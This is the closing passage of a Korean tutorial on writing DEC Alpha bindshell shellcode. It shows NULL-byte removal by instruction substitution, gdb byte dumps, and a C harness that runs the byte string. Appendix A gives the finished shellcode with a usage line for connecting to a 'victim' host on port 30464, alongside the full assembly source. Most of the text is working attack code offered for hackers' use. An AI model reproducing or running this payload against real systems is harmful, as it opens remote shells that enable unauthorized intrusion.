0x1200011e8 <main+232>: 0x80    0x74    0xe7    0x47    0xff    0x7f    0xea    0x6b
0x1200011f0 <main+240>: 0x1f    0x04    0xff    0x47    0x1f    0x04    0xff    0x47
0x1200011f8 <main+248>: 0x1f    0x04    0xff    0x47

많은 NULL들이 사라졌다.
이제 남은 일은 몇가지 트릭을 써서 alpha bindshell code를 완성시키는 것이다.
주로 null code들이 보이는 곳은 system call number를 부르는 곳이다.
이를 테면,

(gdb) l 26
21
22       socket_start:
23              addq $31, 0x2, $16
24              addq $31, 0x1, $17
25              addq $31, 0x6, $18
26              addq $31, 0x61, $0
27              jsr $26,($10),0xffff
28              stq $0, 416($fp) 
29
30       bind_start: 
(gdb) x main+56
0x120001138 <main+56>:  0x43ec3400

이정도...
이것은 간단히 cmoveq라는 인스트럭션으로 치환하자. !
그리고  mov 0x00077002,$1 라는 인스트럭션도 sift인스트럭션을 써서 
가뿐히 치환해 볼것이다.


======================= fourth code here ! - it's the last one ===================

.text
        .globl main
        .ent main
main :
        lda $sp, -440($sp)
        mov $sp, $fp

call_pal_set_here:
        addq $31,0x83,$1
        stl $1, 432($fp)
        addq $fp,432,$10
ret_set_here:
        mov 0x6bfa8001, $1
        stl $1,436($fp)

routine_start:
var_set:
        mov 0x0077,$1
        sll $1, 16, $1
        addq $1, 0x0002, $1
        stq $1, 400($fp)

socket_start:
        addq $31, 0x2, $16
        addq $31, 0x1, $17
        addq $31, 0x6, $18
        cmoveq $31, 0x61, $0
        jsr $26,($10),0xffff
        stq $0, 416($fp) 

bind_start: 
        ldq $16, 416($fp)
        lda $17, 400($fp)
        addq $31,0x10,$18
        cmoveq $31, 0x68, $0
        jsr $26,($10),0xffff

listen_start:
        ldq $16, 416($fp)
        addq $31, 0x1, $17
        cmoveq $31, 0x6a, $0
        jsr $26,($10),0xffff

accept_start:
        ldq $16, 416($fp)
        bis $31, $31, $17
        bis $31, $31, $18
        cmoveq $31, 0x63, $0
        jsr $26,($10),0xffff
        stq $0, 424($fp) 

dup2_start:
        ldq $16, 424($fp)
        bis $31,$31,$17
        cmoveq $31, 0x5a, $0
        jsr $26,($10),0xffff

        ldq $16, 424($fp)
        addq $31, 0x1,$17
        cmoveq $31, 0x5a, $0
        jsr $26,($10),0xffff

var_release:
        lda $sp, 440($sp)


execve_start:
        subq $sp,424,$sp
        mov $sp,$fp

        mov 0x6e69622f, $1
        mov 0x68732fff, $2
        srl $2,0x08,$2
        stl $1, 400($fp)
        stl $2, 404($fp)
        stq $fp,408($fp)
        stq $31,416($fp)

        lda $16, 400($fp)
        lda $17, 408($fp)
        clr $18

start_here:
        addq $31,0x83,$4
        stl $4, 424($fp)
        addq $fp,424,$5

        cmoveq $31,0x3b,$0
        jsr $31,($10),0xffff

        .end main
        

0x120001100 <main>:     0x48    0xfe    0xde    0x23    0x0f    0x04    0xde    0x47
0x120001108 <main+8>:   0x01    0x74    0xf0    0x43    0xb0    0x01    0x2f    0xb0
0x120001110 <main+16>:  0xb0    0x01    0x4f    0x21    0xfb    0x6b    0x3f    0x24
0x120001118 <main+24>:  0x01    0x80    0x21    0x20    0xb4    0x01    0x2f    0xb0
0x120001120 <main+32>:  0x01    0xf4    0xee    0x43    0x21    0x17    0x22    0x48
0x120001128 <main+40>:  0x01    0x54    0x20    0x40    0x90    0x01    0x2f    0xb4
0x120001130 <main+48>:  0x10    0x54    0xe0    0x43    0x11    0x34    0xe0    0x43
0x120001138 <main+56>:  0x12    0xd4    0xe0    0x43    0x80    0x34    0xec    0x47
0x120001140 <main+64>:  0xff    0x7f    0x4a    0x6b    0xa0    0x01    0x0f    0xb4
0x120001148 <main+72>:  0xa0    0x01    0x0f    0xa6    0x90    0x01    0x2f    0x22
0x120001150 <main+80>:  0x12    0x14    0xe2    0x43    0x80    0x14    0xed    0x47
0x120001158 <main+88>:  0xff    0x7f    0x4a    0x6b    0xa0    0x01    0x0f    0xa6
0x120001160 <main+96>:  0x11    0x34    0xe0    0x43    0x80    0x54    0xed    0x47
0x120001168 <main+104>: 0xff    0x7f    0x4a    0x6b    0xa0    0x01    0x0f    0xa6
0x120001170 <main+112>: 0x11    0x04    0xff    0x47    0x12    0x04    0xff    0x47
0x120001178 <main+120>: 0x80    0x74    0xec    0x47    0xff    0x7f    0x4a    0x6b
0x120001180 <main+128>: 0xa8    0x01    0x0f    0xb4    0xa8    0x01    0x0f    0xa6
0x120001188 <main+136>: 0x11    0x04    0xff    0x47    0x80    0x54    0xeb    0x47
0x120001190 <main+144>: 0xff    0x7f    0x4a    0x6b    0xa8    0x01    0x0f    0xa6
0x120001198 <main+152>: 0x11    0x34    0xe0    0x43    0x80    0x54    0xeb    0x47
0x1200011a0 <main+160>: 0xff    0x7f    0x4a    0x6b    0xb8    0x01    0xde    0x23
0x1200011a8 <main+168>: 0x58    0xfe    0xde    0x23    0x0f    0x04    0xde    0x47
0x1200011b0 <main+176>: 0x69    0x6e    0x3f    0x24    0x2f    0x62    0x21    0x20
0x1200011b8 <main+184>: 0x73    0x68    0x5f    0x24    0xff    0x2f    0x42    0x20
0x1200011c0 <main+192>: 0x82    0x16    0x41    0x48    0x90    0x01    0x2f    0xb0
0x1200011c8 <main+200>: 0x94    0x01    0x4f    0xb0    0x98    0x01    0xef    0xb5
0x1200011d0 <main+208>: 0xa0    0x01    0xef    0xb7    0x90    0x01    0x0f    0x22
0x1200011d8 <main+216>: 0x98    0x01    0x2f    0x22    0x12    0x04    0xff    0x47
0x1200011e0 <main+224>: 0x04    0x74    0xf0    0x43    0xa8    0x01    0x8f    0xb0
0x1200011e8 <main+232>: 0xa8    0x01    0xaf    0x20    0x80    0x74    0xe7    0x47
0x1200011f0 <main+240>: 0xff    0x7f    0xea    0x6b

자 모든 null code가 사라 졌다.
우리의 dec-alpha-bindsh이 만들어진것이다 !
결코 어렵지 않다. 이러한 프로세스로 겨우 몇시간 남짓한 시간이 걸렸을 뿐이다.



[step H.] - test your byte stream !

이것을 실행 코드로 옮겨서 테스트 해보자.

============================= realy last code ! =============================


char code[] =
"\x48\xfe\xde\x23\x0f\x04\xde\x47\x01\x74\xf0\x43\xb0\x01\x2f\xb0"
"\xb0\x01\x4f\x21\xfb\x6b\x3f\x24\x01\x80\x21\x20\xb4\x01\x2f\xb0"
"\x01\xf4\xee\x43\x21\x17\x22\x48\x01\x54\x20\x40\x90\x01\x2f\xb4"
"\x10\x54\xe0\x43\x11\x34\xe0\x43\x12\xd4\xe0\x43\x80\x34\xec\x47"
"\xff\x7f\x4a\x6b\xa0\x01\x0f\xb4\xa0\x01\x0f\xa6\x90\x01\x2f\x22"
"\x12\x14\xe2\x43\x80\x14\xed\x47\xff\x7f\x4a\x6b\xa0\x01\x0f\xa6"
"\x11\x34\xe0\x43\x80\x54\xed\x47\xff\x7f\x4a\x6b\xa0\x01\x0f\xa6"
"\x11\x04\xff\x47\x12\x04\xff\x47\x80\x74\xec\x47\xff\x7f\x4a\x6b"
"\xa8\x01\x0f\xb4\xa8\x01\x0f\xa6\x11\x04\xff\x47\x80\x54\xeb\x47"
"\xff\x7f\x4a\x6b\xa8\x01\x0f\xa6\x11\x34\xe0\x43\x80\x54\xeb\x47"
"\xff\x7f\x4a\x6b\xb8\x01\xde\x23\x58\xfe\xde\x23\x0f\x04\xde\x47"
"\x69\x6e\x3f\x24\x2f\x62\x21\x20\x73\x68\x5f\x24\xff\x2f\x42\x20"
"\x82\x16\x41\x48\x90\x01\x2f\xb0\x94\x01\x4f\xb0\x98\x01\xef\xb5"
"\xa0\x01\xef\xb7\x90\x01\x0f\x22\x98\x01\x2f\x22\x12\x04\xff\x47"
"\x04\x74\xf0\x43\xa8\x01\x8f\xb0\xa8\x01\xaf\x20\x80\x74\xe7\x47"
"\xff\x7f\xea\x6b"
;

void (*f)();
main()
{
        f = code;
        f();
}

./test ; telnet localhost 30464
wow ! 잘 돌아 가는 것 같다.
바로 www.hack.co.za에 올려도 될 것 같지 않은가 ? 
;)



2. 결론 
----------------------

알레프원이 쉘코드 짜는 법을 소개한지도 굉장히 오랜 시간이 지났다. 그럼에도 불구하고,
사람들은 여러가지 쉘코드에 대해서 그다지 많은 신경을 쓰는 것 같지 않다. 약간의 필요한 소스들 
만이 소수 해커그룹에서 - 이를 테면 ADM팀의 K2, Rihno9 정도가 그들이라고 할 수 있겠다. 이들은 
각각의 오에스와 아키텍쳐에 대해 간단한 shellcode를 짜냈었다. 이것이 그들 팀의 논의 하에 
이루어진 것인지 아닌지는 아직까지 확인 하지 못했다. 다만 그것이 그들의 시스템 해킹에 필요했을 
것이란 생각뿐이다. - 만들어 지고 있다.

어떤 버퍼오버플로우 document에서는 심지어 shellcode에 대해 한마디 언급도 하지않는 것 같다. 
마치 /* aleph1's shellcode */ 라는 주석이 모든 것을  설명해 준다고 믿는 듯 말이다.

그도 그럴것이 shellcode가 상당히 기계와 오에스에 의존적인 어셈블리에 관계가 있고, 디바이스 
프로그래머가 아닌이상 이를  익숙하게 사용한다는 것이 그리 쉬운 일이 아니기 때문이다. 하지만 
shellcode는 적절히 쓰이기 위해 많은 해커들에게 필요하다. 지금의 현실이란  그러한 적절한 코드들이
너무도 모자라는 것이다.  Bacchante 프로젝트는 그런 취지하에서 시작되었으며, 더욱 많은 해커들이 
참여해 주었으면 하는 소망을 가지고 있다.
그사람들이 우리 hard study hacker들이면 더욱 좋겠다.
:)

% 참고로 . alpha assembly에 관한 문서는 나중에 따로 첨부 하도록 하겠다.
본 문서에서 중요한 것은 쉘코드를 만드는 과정내지는 절차였였으므로...

그러면다음 문서에서 볼때까지 우리 hard study hacker들의 건투를 빈다 ! 



3. APPENDIX A
---------------------

/*
* dec alpha bindshell here !
* usage : telnet victim.host.com 30464
*
* truefinder, seo@igrus.inha.ac.kr (2001/06/27)
* 
*/

char code[] =
"\x48\xfe\xde\x23\x0f\x04\xde\x47\x01\x74\xf0\x43\xb0\x01\x2f\xb0"
"\xb0\x01\x4f\x21\xfb\x6b\x3f\x24\x01\x80\x21\x20\xb4\x01\x2f\xb0"
"\x01\xf4\xee\x43\x21\x17\x22\x48\x01\x54\x20\x40\x90\x01\x2f\xb4"
"\x10\x54\xe0\x43\x11\x34\xe0\x43\x12\xd4\xe0\x43\x80\x34\xec\x47"
"\xff\x7f\x4a\x6b\xa0\x01\x0f\xb4\xa0\x01\x0f\xa6\x90\x01\x2f\x22"
"\x12\x14\xe2\x43\x80\x14\xed\x47\xff\x7f\x4a\x6b\xa0\x01\x0f\xa6"
"\x11\x34\xe0\x43\x80\x54\xed\x47\xff\x7f\x4a\x6b\xa0\x01\x0f\xa6"
"\x11\x04\xff\x47\x12\x04\xff\x47\x80\x74\xec\x47\xff\x7f\x4a\x6b"
"\xa8\x01\x0f\xb4\xa8\x01\x0f\xa6\x11\x04\xff\x47\x80\x54\xeb\x47"
"\xff\x7f\x4a\x6b\xa8\x01\x0f\xa6\x11\x34\xe0\x43\x80\x54\xeb\x47"
"\xff\x7f\x4a\x6b\xb8\x01\xde\x23\x58\xfe\xde\x23\x0f\x04\xde\x47"
"\x69\x6e\x3f\x24\x2f\x62\x21\x20\x73\x68\x5f\x24\xff\x2f\x42\x20"
"\x82\x16\x41\x48\x90\x01\x2f\xb0\x94\x01\x4f\xb0\x98\x01\xef\xb5"
"\xa0\x01\xef\xb7\x90\x01\x0f\x22\x98\x01\x2f\x22\x12\x04\xff\x47"
"\x04\x74\xf0\x43\xa8\x01\x8f\xb0\xa8\x01\xaf\x20\x80\x74\xe7\x47"
"\xff\x7f\xea\x6b"
;

void (*f)();
main()
{
        f = code;
        f();
}



/*  assembly code below !


.text
        .globl main
        .ent main
main :
        lda $sp, -440($sp)
        mov $sp, $fp

call_pal_set_here:
        addq $31,0x83,$1
        stl $1, 432($fp)
        addq $fp,432,$10
ret_set_here:
        mov 0x6bfa8001, $1
        stl $1,436($fp)

routine_start:
var_set:
        mov 0x0077,$1
        sll $1, 16, $1
        addq $1, 0x0002, $1
        stq $1, 400($fp)

socket_start:
        addq $31, 0x2, $16
        addq $31, 0x1, $17
        addq $31, 0x6, $18
        cmoveq $31, 0x61, $0
        jsr $26,($10),0xffff
        stq $0, 416($fp) 

bind_start: 
        ldq $16, 416($fp)
        lda $17, 400($fp)
        addq $31,0x10,$18
        cmoveq $31, 0x68, $0
        jsr $26,($10),0xffff

listen_start:
        ldq $16, 416($fp)
        addq $31, 0x1, $17
        cmoveq $31, 0x6a, $0
        jsr $26,($10),0xffff

accept_start:
        ldq $16, 416($fp)
        bis $31, $31, $17
        bis $31, $31, $18
        cmoveq $31, 0x63, $0
        jsr $26,($10),0xffff
        stq $0, 424($fp) 

dup2_start:
        ldq $16, 424($fp)
        bis $31,$31,$17
        cmoveq $31, 0x5a, $0
        jsr $26,($10),0xffff

        ldq $16, 424($fp)
        addq $31, 0x1,$17
        cmoveq $31, 0x5a, $0
        jsr $26,($10),0xffff

var_release:
        lda $sp, 440($sp)


execve_start:
        subq $sp,424,$sp
        mov $sp,$fp

        mov 0x6e69622f, $1
        mov 0x68732fff, $2
        srl $2,0x08,$2
        stl $1, 400($fp)
        stl $2, 404($fp)
        stq $fp,408($fp)
        stq $31,416($fp)

        lda $16, 400($fp)
        lda $17, 408($fp)
        clr $18

start_here:
        addq $31,0x83,$4
        stl $4, 424($fp)
        addq $fp,424,$5

        cmoveq $31,0x3b,$0
        jsr $31,($10),0xffff

        .end main
*/